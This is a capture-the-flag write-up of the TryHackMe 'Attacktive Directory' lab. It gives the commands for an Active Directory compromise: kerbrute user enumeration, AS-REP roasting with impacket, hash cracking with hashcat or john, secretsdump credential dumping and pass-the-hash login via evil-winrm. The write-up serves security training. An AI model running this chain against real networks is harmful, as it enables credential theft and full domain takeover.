| Room | Attacktive Directory |
|---|---|
| Target OS | Windows |
| Difficulty | Easy |
| Description | 99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller? |
| Maker | Sq00ky |
Reconnaissance
As always, the first step consists of the reconnaissance phase as port scanning.
Ports Scanning
During this step, we’re gonna identify the target to see what we have behind the IP Address.
nmap -sC -sV -oA nmap 10.10.243.65
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-30 22:45:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2020-09-30T22:48:24+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2020-09-29T21:34:03
|_Not valid after: 2021-03-31T21:34:03
|_ssl-date: 2020-09-30T22:48:40+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/1%Time=5F750AAC%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Enumerating Port 80
We can start by looking at the webserver. There’s a default IIS web server page we can do directory enumeration but this box is related to Active Directory so let’s move forward.
There’s a DNS Domain name that we’re going to insert in the host’s file. echo 10.10.243.65 spookysec.local >> /etc/hosts
Enumerating SMB
Let’s enumerate 139, 445 ports.
enum4linux
enum4linux -a spookysec.local
Nmap output suggested our Domain Name was spookysec.local however, enum4linux shows THM-AD.
enum4linux failed to provide much information such as users.
kerbrute
kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt
2020/10/01 04:50:02 > [+] VALID USERNAME: james@spookysec.local
2020/10/01 04:50:06 > [+] VALID USERNAME: svc-admin@spookysec.local
2020/10/01 04:50:12 > [+] VALID USERNAME: James@spookysec.local
2020/10/01 04:50:14 > [+] VALID USERNAME: robin@spookysec.local
2020/10/01 04:50:36 > [+] VALID USERNAME: darkstar@spookysec.local
2020/10/01 04:50:50 > [+] VALID USERNAME: administrator@spookysec.local
2020/10/01 04:51:28 > [+] VALID USERNAME: backup@spookysec.local
2020/10/01 04:51:41 > [+] VALID USERNAME: paradox@spookysec.local
2020/10/01 04:53:01 > [+] VALID USERNAME: JAMES@spookysec.local
2020/10/01 04:53:28 > [+] VALID USERNAME: Robin@spookysec.local
2020/10/01 04:56:11 > [+] VALID USERNAME: Administrator@spookysec.local
2020/10/01 05:02:01 > [+] VALID USERNAME: Darkstar@spookysec.local
2020/10/01 05:03:55 > [+] VALID USERNAME: Paradox@spookysec.local
2020/10/01 05:10:02 > [+] VALID USERNAME: DARKSTAR@spookysec.local
2020/10/01 05:11:51 > [+] VALID USERNAME: ori@spookysec.local
2020/10/01 05:15:01 > [+] VALID USERNAME: ROBIN@spookysec.local
Exploiting Kerberos
We now want to crack Active Directory passwords with AS-REP Roasting. This is an attack against Kerberos for user accounts that do not require pre-authentication.
python /opt/impacket/examples/GetNPUsers.py spookysec.local/ -usersfile valid-users.txt
Cracking
Let’s decrypt the hash using hashcat and login to smb.
hashcat -m 18200 svc-admin.txt /usr/share/wordlists/SecLists/AD-Wordlists/passwordlist.txt --force
“-m 18200” specifies the “mode” we want to use. Use the Hashcat Wiki to read all the different modes when cracking hash values:
OR you can use john as well.
john svc-admin.txt --wordlist=/usr/share/wordlists/SecLists/AD-Wordlists/passwordlist.txt
Running john or hashcat will give us a password.
Enumerating the DC (Domain Controller)
As we found a password from our previous step we’re gonna use those creds to login to smb shares.
smbclient -L //10.10.225.20/ --user svc-admin
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
We found some shares and backup seems interesting.
We found the backup_credentials.txt file inside the backup share.
Let’s take a look at what’s that includes.
It’s a base64 encoding.
Decrypting that will give another credential for the user backup.
Elevating Privileges
python secretsdump.py -just-dc backup@spookysec.local
Dumping this revels administrator NTLM hash. Now we can crack the hash or use evil-winrm to connect to the administrator.
./evil-winrm.rb -i 10.10.225.20 -u Administrator -H (HASH HERE)
